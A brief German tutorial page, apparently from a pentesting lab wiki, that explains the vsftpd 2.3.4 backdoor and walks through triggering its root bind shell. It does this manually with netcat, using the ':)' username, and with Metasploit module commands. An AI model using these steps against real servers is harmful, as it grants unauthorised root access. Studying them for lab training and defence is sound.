Metasploit VSFTP 2.3.4
Zur Navigation springen
Zur Suche springen
Schwachstelle
- In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt
- Dabei wurde eine Bind-Shell auf TCP Port 6200 geöffnet, wenn man ":)" als Nutzernamen eingibt
Manuell nachspielen
- Zwei Terminals vorbereiten
- Terminal 1 verbindet sich zum FTP-Server, nachdem der Exploit ausgeführt wurde, mit:
- nc IP.des.ftp.servers 6200
- Terminal 2 löst den Exploit aus
- nc IP.des.ftp.servers 21
- folgende Zeilen eingeben:
USER user:) PASS pass
- Wenn diese zwei Zeilen eingegeben wurden, kann man den Befehl auf Terminal 1 abschicken
- Der Befehl sollte nach dem Ausführen nichts anzeigen, was bedeutet, dass die Verbindung aufgebaut wurde
- folgedende Tests kann man durchführen, um zu sehen, ob man eine Shell hat:
- ip a
- id
- pwd
- ls
Metasploit benutzen
- Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren
- msfconsole
- use exploit/unix/ftp/vsftpd_234_backdoor
- set RHOSTS IP.des.ftp.servers
- set RPORT 21
- set payload cmd/unix/interact
- exploit
- Nun sollte man genau wie oben eine sehr minimale Shell haben